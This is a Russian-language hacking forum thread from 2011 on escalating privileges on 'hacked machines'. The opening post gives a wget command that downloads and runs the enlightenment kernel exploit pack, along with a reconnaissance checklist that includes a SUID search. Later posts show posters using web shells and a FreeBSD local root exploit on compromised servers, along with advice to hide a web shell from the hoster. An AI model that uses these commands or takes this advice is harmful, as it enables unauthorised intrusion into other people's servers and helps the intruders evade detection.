Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Повышение прав [задай вопрос - получи ответ] (https://forum.antichat.xyz/showthread.php?t=296327)

Expl0ited 01.10.2011 19:22

Эта тема создана для вопросов связанных с повышением привилегий (рутинг, компиляция сплоитов, помощь в поиске сплоитов) на взломанных машинах.

Первая часть темы тут.

Мануал новичкам: Рутанье

Сплоиты можно найти тут и тут

Связка сплоитов enlightenment запускается так:

Код:

Code:
1. wget http://www.grsecurity.net/~spender/exploits/enlightenment.tgz && tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh
2. Выбираем сплоит.
3. PROFIT!!!

ПОСТЫ ОФОРМЛЕННЫЕ ОТЛИЧНО ОТ ПРАВИЛ ПЕРВОГО ПОСТА, УДАЛЯЮТСЯ! пруф

Внимание!

Если в выводе команды uname -a, вы наблюдаете нечто похожее: Linux ****** 2.*.**-NX

Это сервер принадлежит компании SpaceWeb (sweb.ru), и порутать его (сервер) практически невозможно! Так что все посты в котором фигурирует эти сервера (сервера SpaceWeb) УДАЛЯЮТСЯ!

Тоже самое касается серверов компанийДжино (www.jino.ru), Мастерхост (masterhost.ru) и 1gb (1gb.ru). пруф

Сообщение с вопросом должно содержать информацию из вывода следующих команд:
  • uname -a
  • ls -la /boot
  • lls -la --full-time /lib (или /lib64)
  • mount
  • df -h
  • cat /etc/issue
  • cat /etc/crontab (ls -la cron.d, cron.hourly, cron.monthly, cron.weekly) + вывод содержимого каждого файла из этих директорий.
  • cat /proc/version
  • cat /proc/sys/vm/mmap_min_addr
  • pwd
  • ls -la /usr/bin/staprun
  • find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
Так же обязательно писать всё, что вы пробовали для повышения привилегий, какие возникли ошибки.

Пример сообщения:

Цитата:

Сообщение от Новичок
Новичок said:
Код:

Code:
sh-3.2# uname -a
Linux 2.6.18-194.8.1.el5 #1 SMP Thu Jul 1 19:04:48 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# ls -la /lib/libc*
-rwxr-xr-x 1 root root 1693812 Jun 27 21:25 /lib/libc-2.5.so
-rwxr-xr-x 1 root root  191708 Jun 27 21:25 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root      14 Jun 30 03:04 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root      17 Oct 22  2009 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root    7748 Sep  3  2009 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root  45432 Jun 27 21:25 /lib/libcrypt-2.5.so
-rwxr-xr-x 1 root root 1296964 Dec 15  2010 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root      14 Sep 15  2008 /lib/libcrypto.so.4 -> libcrypto.so.6
lrwxrwxrwx 1 root root      19 Dec 28  2010 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root      15 Jun 30 03:04 /lib/libcrypt.so.1 -> libcrypt-2.5.so
lrwxrwxrwx 1 root root      11 Jun 30 03:04 /lib/libc.so.6 -> libc-2.5.so
sh-3.2# ls -la /boot
total 17891
drwxr-xr-x  4 root root    3072 Aug  9  2010 .
drwxr-xr-x 29 root root    4096 Jun 23 03:02 ..
-rw-r--r--  1 root root      0 Mar 14  2010 1
-rwxr--r--  1 root root    6144 Dec 15  2009 aquota.user
-rw-r--r--  1 root root  65972 Jan 20  2010 config-2.6.18-164.11.1.el5
-rw-r--r--  1 root root  65972 Mar 17  2010 config-2.6.18-164.15.1.el5
-rw-r--r--  1 root root  66891 Jul  2  2010 config-2.6.18-194.8.1.el5
drwxr-xr-x  2 root root    1024 Aug  9  2010 grub
-rw-------  1 root root 2674675 Mar  9  2010 initrd-2.6.18-164.11.1.el5.img
-rw-------  1 root root 2674826 May  9  2010 initrd-2.6.18-164.15.1.el5.img
-rw-------  1 root root 2700121 Aug  9  2010 initrd-2.6.18-194.8.1.el5.img
drwx------  2 root root  12288 Sep 15  2008 lost+found
-rw-r--r--  1 root root  80032 Mar 16  2009 message
-rwxr--r--  1 root root      32 Dec 15  2009 quota.user
-rw-r--r--  1 root root  108759 Jan 20  2010 symvers-2.6.18-164.11.1.el5.gz
-rw-r--r--  1 root root  108759 Mar 17  2010 symvers-2.6.18-164.15.1.el5.gz
-rw-r--r--  1 root root  112713 Jul  2  2010 symvers-2.6.18-194.8.1.el5.gz
-rw-r--r--  1 root root 1227215 Jan 20  2010 System.map-2.6.18-164.11.1.el5
-rw-r--r--  1 root root 1227352 Mar 17  2010 System.map-2.6.18-164.15.1.el5
-rw-r--r--  1 root root 1243148 Jul  2  2010 System.map-2.6.18-194.8.1.el5
-rw-r--r--  1 root root 1936156 Jan 20  2010 vmlinuz-2.6.18-164.11.1.el5
-rw-r--r--  1 root root    163 Jan 20  2010 .vmlinuz-2.6.18-164.11.1.el5.hmac
-rw-r--r--  1 root root 1936444 Mar 17  2010 vmlinuz-2.6.18-164.15.1.el5
-rw-r--r--  1 root root    163 Mar 17  2010 .vmlinuz-2.6.18-164.15.1.el5.hmac
-rw-r--r--  1 root root 1954620 Jul  2  2010 vmlinuz-2.6.18-194.8.1.el5
-rw-r--r--  1 root root    162 Jul  2  2010 .vmlinuz-2.6.18-194.8.1.el5.hmac
sh-3.2# mount
/dev/sda5 on / type ext3 (rw,usrquota)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/sda8 on /tmp type ext3 (rw,noexec,nosuid)
/dev/sda7 on /home type ext3 (rw,usrquota)
/dev/sdb1 on /backup type ext3 (rw)
/dev/sda3 on /usr type ext3 (rw,usrquota)
/dev/sda2 on /var type ext3 (rw,usrquota)
/dev/sda1 on /boot type ext3 (rw)
tmpfs on /dev/shm type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/tmp on /var/tmp type none (rw,noexec,nosuid,bind)
sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)
sh-3.2# pwd
/home/user
sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda5            9.7G  987M  8.3G  11% /
/dev/sda8            996M  42M  903M  5% /tmp
/dev/sda7            195G  51G  134G  28% /home
/dev/sdb1            227G  163G  53G  76% /backup
/dev/sda3            9.7G  6.6G  2.6G  72% /usr
/dev/sda2            9.7G  5.5G  3.8G  60% /var
/dev/sda1              99M  24M  71M  25% /boot
tmpfs                3.9G    0  3.9G  0% /dev/shm
sh-3.2# cat /etc/issue
This computer system is for authorized users only. Individuals using this
system without authority or in excess of their authority are subject to
having all their activities on this system monitored and recorded or
examined by any authorized person, including law enforcement, as system
personnel deem appropriate. In the course of monitoring individuals
improperly using the system or in the course of system maintenance, the
activities of authorized users may also be monitored and recorded. Any
material so recorded may be disclosed as appropriate. Anyone using this
system consents to these terms.

Пробовал enlightenment, не берет.

Оффтоп, флейм и тупые вопросы не приветствуются и удаляются, рецидивисты получают статус "рид-онли", однако грамотная помощь задающим вопросы поощряется.

Sidarovich1975 03.10.2011 18:52

FreeBSD 8.0

Есть проблема!

сервер :

FreeBSD 8.0-RELEASE-p2 #0: Thu May 20 16:16:55 UTC 2010

Я залил эксплоит и сделал все как тут:

http://www.attackvector.org/freebsd-8-7-local-root-exploit/?utm_source=feedburner&utm_medium=twitter&utm_camp aign=Feed%3A+attackvector+%28Attack+Vector%29

Затем меня выкинуло, и теперь не подключается неткат, пишет :

__________________________________________________ ________________________________

/libexec/ld-elf.so.1: /bin/sh: Unsupported version 37008 of Elf_Verneed entry

__________________________________________________ ________________________________

и не выкидывает.....

в wso 2.4 и wso 2.5 консоль не работает вообще (ни порт забиндить ни команду выполнить)

как можно выполнить на сервере команду еще?

попал в ступор... не пойму куда дальше двигаться...

rootxcl 03.10.2011 20:07

sh-3.2$ uname -a

Linux HPX001.local 2.6.26-1-686 #1 SMP Sat Jan 10 18:29:31 UTC 2009 i686 GNU/Lin

ux

sh-3.2$ ls -la /boot

total 15720

drwxr-xr-x 4 root root 1024 Feb 26 2009 .

drwxr-xr-x 21 root root 4096 Feb 26 2009 ..

-rw-r--r-- 1 root root 882741 Dec 2 2008 System.map-2.6.24-etchnhalf.1-686

-rw-r--r-- 1 root root 928053 Jan 10 2009 System.map-2.6.26-1-686

-rw-r--r-- 1 root root 86418 Dec 2 2008 config-2.6.24-etchnhalf.1-686

-rw-r--r-- 1 root root 91640 Jan 10 2009 config-2.6.26-1-686

drwxr-xr-x 2 root root 1024 Feb 26 2009 grub

-rw-r--r-- 1 root root 4870120 Dec 30 2008 initrd.img-2.6.24-etchnhalf.1-686

-rw-r--r-- 1 root root 6180050 Feb 26 2009 initrd.img-2.6.26-1-686

drwxr-xr-x 2 root root 12288 Dec 30 2008 lost+found

-rw-r--r-- 1 root root 1456344 Dec 2 2008 vmlinuz-2.6.24-etchnhalf.1-686

-rw-r--r-- 1 root root 1505936 Jan 10 2009 vmlinuz-2.6.26-1-686

sh-3.2$ ls -la --full-time /lib/libc*

-rwxr-xr-x 1 root root 1294572 2009-01-04 19:11:21.000000000 +0100 /lib/libc-2.7

.so

lrwxrwxrwx 1 root root 11 2009-02-26 03:56:51.000000000 +0100 /lib/libc.so.

6 -> libc-2.7.so

lrwxrwxrwx 1 root root 14 2009-02-26 04:01:28.000000000 +0100 /lib/libcap.s

o.2 -> libcap.so.2.11

-rw-r--r-- 1 root root 13364 2008-07-26 17:26:50.000000000 +0200 /lib/libcap.s

o.2.11

lrwxrwxrwx 1 root root 17 2009-02-26 03:57:01.000000000 +0100 /lib/libcfont

.so.0 -> libcfont.so.0.0.0

-rw-r--r-- 1 root root 10712 2008-04-15 23:18:10.000000000 +0200 /lib/libcfont

.so.0.0.0

-rw-r--r-- 1 root root 185816 2009-01-04 19:11:21.000000000 +0100 /lib/libcidn-

2.7.so

lrwxrwxrwx 1 root root 14 2009-02-26 03:56:51.000000000 +0100 /lib/libcidn.

so.1 -> libcidn-2.7.so

lrwxrwxrwx 1 root root 17 2009-02-26 03:56:52.000000000 +0100 /lib/libcom_e

rr.so.2 -> libcom_err.so.2.1

-rw-r--r-- 1 root root 8676 2008-10-13 05:33:34.000000000 +0200 /lib/libcom_e

rr.so.2.1

lrwxrwxrwx 1 root root 19 2009-02-26 03:57:01.000000000 +0100 /lib/libconso

le.so.0 -> libconsole.so.0.0.0

-rw-r--r-- 1 root root 72816 2008-04-15 23:18:10.000000000 +0200 /lib/libconso

le.so.0.0.0

-rw-r--r-- 1 root root 38296 2009-01-04 19:11:21.000000000 +0100 /lib/libcrypt

-2.7.so

lrwxrwxrwx 1 root root 15 2009-02-26 03:56:51.000000000 +0100 /lib/libcrypt

.so.1 -> libcrypt-2.7.so

lrwxrwxrwx 1 root root 19 2009-02-26 03:57:01.000000000 +0100 /lib/libctuti

ls.so.0 -> libctutils.so.0.0.0

-rw-r--r-- 1 root root 17024 2008-04-15 23:18:10.000000000 +0200 /lib/libctuti

ls.so.0.0.0

sh-3.2$ mount

/dev/cciss/c0d0p3 on / type ext3 (rw,errors=remount-ro)

tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)

proc on /proc type proc (rw,noexec,nosuid,nodev)

sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)

procbususb on /proc/bus/usb type usbfs (rw)

udev on /dev type tmpfs (rw,mode=0755)

tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)

devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)

/dev/cciss/c0d0p1 on /boot type ext2 (rw)

sh-3.2$ df -h

Filesystem Size Used Avail Use% Mounted on

/dev/cciss/c0d0p3 72G 6.1G 63G 9% /

tmpfs 1.8G 0 1.8G 0% /lib/init/rw

udev 10M 80K 10M 1% /dev

tmpfs 1.8G 0 1.8G 0% /dev/shm

/dev/cciss/c0d0p1 89M 16M 68M 19% /boot

sh-3.2$ cat /etc/issue

Debian GNU/Linux 5.0 \n \l

sh-3.2$ cat /etc/issue

Debian GNU/Linux 5.0 \n \l

sh-3.2$ cat /etc/crontab

# /etc/crontab: system-wide crontab

# Unlike any other crontab you don't have to run the `crontab'

# command to install the new version when you edit this file

# and files in /etc/cron.d. These files also have username fields,

# that none of the other crontabs do.

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command

17 * * * * root cd / && run-parts --report /etc/cron.hourly

25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --repor

t /etc/cron.daily )

47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --repor

t /etc/cron.weekly )

52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --repor

t /etc/cron.monthly )

#

sh-3.2$ cat /proc/version

Linux version 2.6.26-1-686 (Debian 2.6.26-13) (waldi@debian.org) (gcc version 4.

1.3 20080704 (prerelease) (Debian 4.1.2-24)) #1 SMP Sat Jan 10 18:29:31 UTC 2009

Sidarovich1975 03.10.2011 22:17

Цитата:

Сообщение от rootxcl
rootxcl said:
sh-3.2$ uname -a
Linux HPX001.local 2.6.26-1-686 #1 SMP Sat Jan 10 18:29:31 UTC 2009 i686 GNU/Lin
ux
sh-3.2$ ls -la /boot
total 15720
drwxr-xr-x 4 root root 1024 Feb 26 2009 .
drwxr-xr-x 21 root root 4096 Feb 26 2009 ..
-rw-r--r-- 1 root root 882741 Dec 2 2008 System.map-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 928053 Jan 10 2009 System.map-2.6.26-1-686
-rw-r--r-- 1 root root 86418 Dec 2 2008 config-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 91640 Jan 10 2009 config-2.6.26-1-686
drwxr-xr-x 2 root root 1024 Feb 26 2009 grub
-rw-r--r-- 1 root root 4870120 Dec 30 2008 initrd.img-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 6180050 Feb 26 2009 initrd.img-2.6.26-1-686
drwxr-xr-x 2 root root 12288 Dec 30 2008 lost+found
-rw-r--r-- 1 root root 1456344 Dec 2 2008 vmlinuz-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 1505936 Jan 10 2009 vmlinuz-2.6.26-1-686
sh-3.2$ ls -la --full-time /lib/libc*
-rwxr-xr-x 1 root root 1294572 2009-01-04 19:11:21.000000000 +0100 /lib/libc-2.7
.so
lrwxrwxrwx 1 root root 11 2009-02-26 03:56:51.000000000 +0100 /lib/libc.so.
6 -> libc-2.7.so
lrwxrwxrwx 1 root root 14 2009-02-26 04:01:28.000000000 +0100 /lib/libcap.s
o.2 -> libcap.so.2.11
-rw-r--r-- 1 root root 13364 2008-07-26 17:26:50.000000000 +0200 /lib/libcap.s
o.2.11
lrwxrwxrwx 1 root root 17 2009-02-26 03:57:01.000000000 +0100 /lib/libcfont
.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 10712 2008-04-15 23:18:10.000000000 +0200 /lib/libcfont
.so.0.0.0
-rw-r--r-- 1 root root 185816 2009-01-04 19:11:21.000000000 +0100 /lib/libcidn-
2.7.so
lrwxrwxrwx 1 root root 14 2009-02-26 03:56:51.000000000 +0100 /lib/libcidn.
so.1 -> libcidn-2.7.so
lrwxrwxrwx 1 root root 17 2009-02-26 03:56:52.000000000 +0100 /lib/libcom_e
rr.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 8676 2008-10-13 05:33:34.000000000 +0200 /lib/libcom_e
rr.so.2.1
lrwxrwxrwx 1 root root 19 2009-02-26 03:57:01.000000000 +0100 /lib/libconso
le.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 72816 2008-04-15 23:18:10.000000000 +0200 /lib/libconso
le.so.0.0.0
-rw-r--r-- 1 root root 38296 2009-01-04 19:11:21.000000000 +0100 /lib/libcrypt
-2.7.so
lrwxrwxrwx 1 root root 15 2009-02-26 03:56:51.000000000 +0100 /lib/libcrypt
.so.1 -> libcrypt-2.7.so
lrwxrwxrwx 1 root root 19 2009-02-26 03:57:01.000000000 +0100 /lib/libctuti
ls.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 17024 2008-04-15 23:18:10.000000000 +0200 /lib/libctuti
ls.so.0.0.0
sh-3.2$ mount
/dev/cciss/c0d0p3 on / type ext3 (rw,errors=remount-ro)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
procbususb on /proc/bus/usb type usbfs (rw)
udev on /dev type tmpfs (rw,mode=0755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
/dev/cciss/c0d0p1 on /boot type ext2 (rw)
sh-3.2$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/cciss/c0d0p3 72G 6.1G 63G 9% /
tmpfs 1.8G 0 1.8G 0% /lib/init/rw
udev 10M 80K 10M 1% /dev
tmpfs 1.8G 0 1.8G 0% /dev/shm
/dev/cciss/c0d0p1 89M 16M 68M 19% /boot
sh-3.2$ cat /etc/issue
Debian GNU/Linux 5.0 \n \l
sh-3.2$ cat /etc/issue
Debian GNU/Linux 5.0 \n \l
sh-3.2$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --repor
t /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --repor
t /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --repor
t /etc/cron.monthly )
#
sh-3.2$ cat /proc/version
Linux version 2.6.26-1-686 (Debian 2.6.26-13) (waldi@debian.org) (gcc version 4.
1.3 20080704 (prerelease) (Debian 4.1.2-24)) #1 SMP Sat Jan 10 18:29:31 UTC 2009

попробуй это :

https://rdot.org/forum/showthread.php?t=817

Expl0ited 03.10.2011 22:46

rootxcl:

Код:

Code:
1. wget http://www.grsecurity.net/~spender/enlightenment.tgz && tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh
2. Выбираем сплоит.
3. PROFIT!!!


Tigger 03.10.2011 23:37

Цитата:

Сообщение от Expl0ited
Expl0ited said:
rootxcl
:
Код:

Code:
1. wget http://www.grsecurity.net/~spender/enlightenment.tgz && tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh
2. Выбираем сплоит.
3. PROFIT!!!


Все сплоиты из enlightenment'a используют NULL-pointer.

Т.ч. если /proc/sys/vm/mmap_min_addr есть и его значение больше 0, то хер что выйдет.

rootxcl

Скинь результат выполнения команды cat /proc/sys/vm/mmap_min_addr 2>&1

Если файл такой будет и значение больше чем 0, то пробуй Glibc (/tmp у тебя отдельно не примонтирован, должно взять без проблем. (дефолтая эксплуатация через либу libc-*.so))

Цитата:

Сообщение от Sidarovich1975
Sidarovich1975 said:
Есть проблема!
сервер :
FreeBSD 8.0-RELEASE-p2 #0: Thu May 20 16:16:55 UTC 2010
Я залил эксплоит и сделал все как тут:
http://www.attackvector.org/freebsd-8-7-local-root-exploit/?utm_source=feedburner&utm_medium=twitter&utm_camp aign=Feed%3A+attackvector+%28Attack+Vector%29
Затем меня выкинуло, и теперь не подключается неткат, пишет :
__________________________________________________ ________________________________
/libexec/ld-elf.so.1: /bin/sh: Unsupported version 37008 of Elf_Verneed entry
__________________________________________________ ________________________________
и не выкидывает.....
в wso 2.4 и wso 2.5 консоль не работает вообще (ни порт забиндить ни команду выполнить)
как можно выполнить на сервере команду еще?
попал в ступор... не пойму куда дальше двигаться...

Ты делал все с двух ТЕРМИНАЛОВ, как написано в сплоите или побрезговал и попытался все сделать с шелла?

Ну чтож, жди пока админ починит и попробуй потом более упрощенные версии даного сплоита отсюда: https://rdot.org/forum/showthread.php?t=601

Пролистай тему, там выложено две модификации.

Sidarovich1975 04.10.2011 00:46

Цитата:

Сообщение от Tigger
Tigger said:
Все сплоиты из enlightenment'a используют NULL-pointer.
Т.ч. если /proc/sys/vm/mmap_min_addr есть и его значение больше 0, то хер что выйдет.
rootxcl
Скинь результат выполнения команды
cat /proc/sys/vm/mmap_min_addr 2>&1
Если файл такой будет и значение больше чем 0, то пробуй Glibc (/tmp у тебя отдельно не примонтирован, должно взять без проблем. (дефолтая эксплуатация через либу libc-*.so))
Ты делал все с
двух ТЕРМИНАЛОВ
, как написано в сплоите или побрезговал и попытался все сделать с шелла?
Ну чтож, жди пока админ починит и попробуй потом более упрощенные версии даного сплоита отсюда: https://rdot.org/forum/showthread.php?t=601
Пролистай тему, там выложено две модификации.

не, ну написал же... ВСЕ как по ссылке... ну а админ как поймет, что что-то неладно? там порт открытый висел х.з. сколько. нужен вариант другой какой-то, чтобы команды выполнять...

sevenup 04.10.2011 01:58

Цитата:

Сообщение от Sidarovich1975
Sidarovich1975 said:
не, ну написал же... ВСЕ как по ссылке... ну а админ как поймет, что что-то неладно? там порт открытый висел х.з. сколько. нужен вариант другой какой-то, чтобы команды выполнять...

Ну админ, поймёт что что-то не так, как минимум из-за того что у него команды в консоле тоже не будут выполнятся...как и у любого другого пользователя! Думаю ответ на вопрос о другом варианте отпал ? пока не исправят последствия твоих действий...консоль не заработает! Так что единственное что ты можешь сделать, это постараться спрятать шелл так, что бы его не нашли...т.к. если не админ, так его хостер 100% буду проверять сервак на наличии шелов.

winstrool 05.10.2011 22:14

Народ сможет кто помочь с этим:

Цитата:

Сообщение от None
uname -a
Linux ns1.***.de 2.6.18-338.19.1.el5.lve0.8.36 #1 SMP Wed Jul 27 13:20:06 EEST 2011 x86_64 x86_64 x86_64 GNU/Linux
ls -la /boot
drwxr-xr-x 3 root root 4096 Oct 4 06:06 .
drwxr-xr-x 26 root root 4096 Oct 5 05:03 ..
-rw-r--r-- 1 root root 163 Jul 15 14:04 .vmlinuz-2.6.18-238.19.1.el5.hmac
-rw-r--r-- 1 root root 158 Jan 13 2011 .vmlinuz-2.6.18-238.el5.hmac
-rw-r--r-- 1 root root 162 Sep 7 02:46 .vmlinuz-2.6.18-274.3.1.el5.hmac
-rw-r--r-- 1 root root 1261160 Jul 15 14:04 System.map-2.6.18-238.19.1.el5
-rw-r--r-- 1 root root 1260254 Jan 13 2011 System.map-2.6.18-238.el5
-rw-r--r-- 1 root root 1268881 Sep 7 02:46 System.map-2.6.18-274.3.1.el5
-rw-r--r-- 1 root root 1312050 Jul 27 12:26 System.map-2.6.18-338.19.1.el5.lve0.8.36
-rw-r--r-- 1 root root 67215 Jul 15 14:04 config-2.6.18-238.19.1.el5
-rw-r--r-- 1 root root 67210 Jan 13 2011 config-2.6.18-238.el5
-rw-r--r-- 1 root root 67613 Sep 7 02:46 config-2.6.18-274.3.1.el5
-rw-r--r-- 1 root root 68013 Jul 27 12:26 config-2.6.18-338.19.1.el5.lve0.8.36
drwxr-xr-x 2 root root 4096 Oct 5 01:51 grub
-rw------- 1 root root 2676916 Aug 31 13:25 initrd-2.6.18-238.19.1.el5.img
-rw------- 1 root root 2676109 Aug 31 19:22 initrd-2.6.18-238.el5.img
-rw------- 1 root root 2683316 Sep 22 08:32 initrd-2.6.18-274.3.1.el5.img
-rw------- 1 root root 2683198 Oct 4 06:06 initrd-2.6.18-338.19.1.el5.lve0.8.36.img
-rw-r--r-- 1 root root 113923 Jul 15 14:04 symvers-2.6.18-238.19.1.el5.gz
-rw-r--r-- 1 root root 113923 Jan 13 2011 symvers-2.6.18-238.el5.gz
-rw-r--r-- 1 root root 116158 Sep 7 02:47 symvers-2.6.18-274.3.1.el5.gz
-rw-r--r-- 1 root root 121331 Jul 27 12:27 symvers-2.6.18-338.19.1.el5.lve0.8.36.gz
-rw-r--r-- 1 root root 2097180 Jul 15 14:04 vmlinuz-2.6.18-238.19.1.el5
-rw-r--r-- 1 root root 2094652 Jan 13 2011 vmlinuz-2.6.18-238.el5
-rw-r--r-- 1 root root 2106012 Sep 7 02:46 vmlinuz-2.6.18-274.3.1.el5
-rw-r--r-- 1 root root 2010108 Jul 27 12:26 vmlinuz-2.6.18-338.19.1.el5.lve0.8.36
ls -la --full-time /lib/libc*
-rwxr-xr-x 1 root root 1693812 2011-08-12 19:48:50.000000000 +0200 /lib/libc-2.5.so
lrwxrwxrwx 1 root root 11 2011-09-14 02:06:44.000000000 +0200 /lib/libc.so.6 -> libc-2.5.so
lrwxrwxrwx 1 root root 11 2011-08-31 19:18:03.000000000 +0200 /lib/libcap.so -> libcap.so.1
lrwxrwxrwx 1 root root 14 2011-08-31 19:17:36.000000000 +0200 /lib/libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root 11560 2007-03-14 19:15:10.000000000 +0100 /lib/libcap.so.1.10
-rwxr-xr-x 1 root root 191708 2011-08-12 19:48:50.000000000 +0200 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root 14 2011-09-14 02:06:44.000000000 +0200 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root 17 2011-09-14 02:06:57.000000000 +0200 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 6364 2011-07-22 07:04:15.000000000 +0200 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 45432 2011-08-12 19:48:50.000000000 +0200 /lib/libcrypt-2.5.so
lrwxrwxrwx 1 root root 15 2011-09-14 02:06:44.000000000 +0200 /lib/libcrypt.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1295616 2011-09-14 21:45:12.000000000 +0200 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 14 2011-08-31 13:52:57.000000000 +0200 /lib/libcrypto.so.4 -> libcrypto.so.6
lrwxrwxrwx 1 root root 19 2011-10-04 06:16:31.000000000 +0200 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
mount
/dev/sda1 on / type ext3 (rw,usrquota)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
/dev/sdb1 on /hdd2 type ext3 (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/usr/tmpDSK on /tmp type ext3 (rw,noexec,nosuid,loop=/dev/loop0)
/tmp on /var/tmp type none (rw,noexec,nosuid,bind)
df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 899G 77G 776G 9% /
tmpfs 7.8G 0 7.8G 0% /dev/shm
/dev/sdb1 917G 148G 723G 17% /hdd2
/usr/tmpDSK 485M 23M 438M 5% /tmp
cat /etc/issue
CloudLinux Server release 5.7
Kernel \r on an \m
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
cat /proc/version
Linux version 2.6.18-338.19.1.el5.lve0.8.36 (***@***.com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-51)) #1 SMP Wed Jul 27 13:20:06 EEST 2011
cat /proc/sys/vm/mmap_min_addr
4096

пробовал: enlightenment и сплоиты 2.6.18-ветки, компилятора на сервире нет или не доступен...

Expl0ited 05.10.2011 22:32

winstrool, не рутается.

Цитата:

Сообщение от None
Jul 27 13:20:06 EEST 2011


Sidarovich1975 06.10.2011 12:59

есть сервак:

__________________________________________________ __________________________

__________________________________________________ __________________________

uname -a

Linux 2.6.9-89.0.9.ELsmp #1 SMP Mon Aug 24 01:51:10 EDT 2009 i686

__________________________________________________ __________________________

ls -la /boot

total 26163

drwxr-xr-x 5 root root 3072 Aug 26 2009 .

drwxr-xr-x 23 root root 4096 Oct 2 08:46 ..

-rw-r--r-- 1 root root 750652 Jan 30 2007 System.map-2.6.9-42.0.8.EL

-rw-r--r-- 1 root root 767450 Jan 30 2007 System.map-2.6.9-42.0.8.ELsmp

-rw-r--r-- 1 root root 749462 Aug 12 2006 System.map-2.6.9-42.EL

-rw-r--r-- 1 root root 766260 Aug 12 2006 System.map-2.6.9-42.ELsmp

-rw-r--r-- 1 root root 760532 May 8 2008 System.map-2.6.9-67.0.15.EL

-rw-r--r-- 1 root root 780162 Jan 14 2009 System.map-2.6.9-78.0.13.EL

-rw-r--r-- 1 root root 797154 Jan 14 2009 System.map-2.6.9-78.0.13.ELsmp

-rw-r--r-- 1 root root 768504 Aug 24 2009 System.map-2.6.9-89.0.9.EL

-rw-r--r-- 1 root root 785498 Aug 24 2009 System.map-2.6.9-89.0.9.ELsmp

-rw-r--r-- 1 root root 50337 Jan 30 2007 config-2.6.9-42.0.8.EL

-rw-r--r-- 1 root root 49930 Jan 30 2007 config-2.6.9-42.0.8.ELsmp

-rw-r--r-- 1 root root 50333 Aug 12 2006 config-2.6.9-42.EL

-rw-r--r-- 1 root root 49926 Aug 12 2006 config-2.6.9-42.ELsmp

-rw-r--r-- 1 root root 50925 May 8 2008 config-2.6.9-67.0.15.EL

-rw-r--r-- 1 root root 51502 Jan 14 2009 config-2.6.9-78.0.13.EL

-rw-r--r-- 1 root root 51127 Jan 14 2009 config-2.6.9-78.0.13.ELsmp

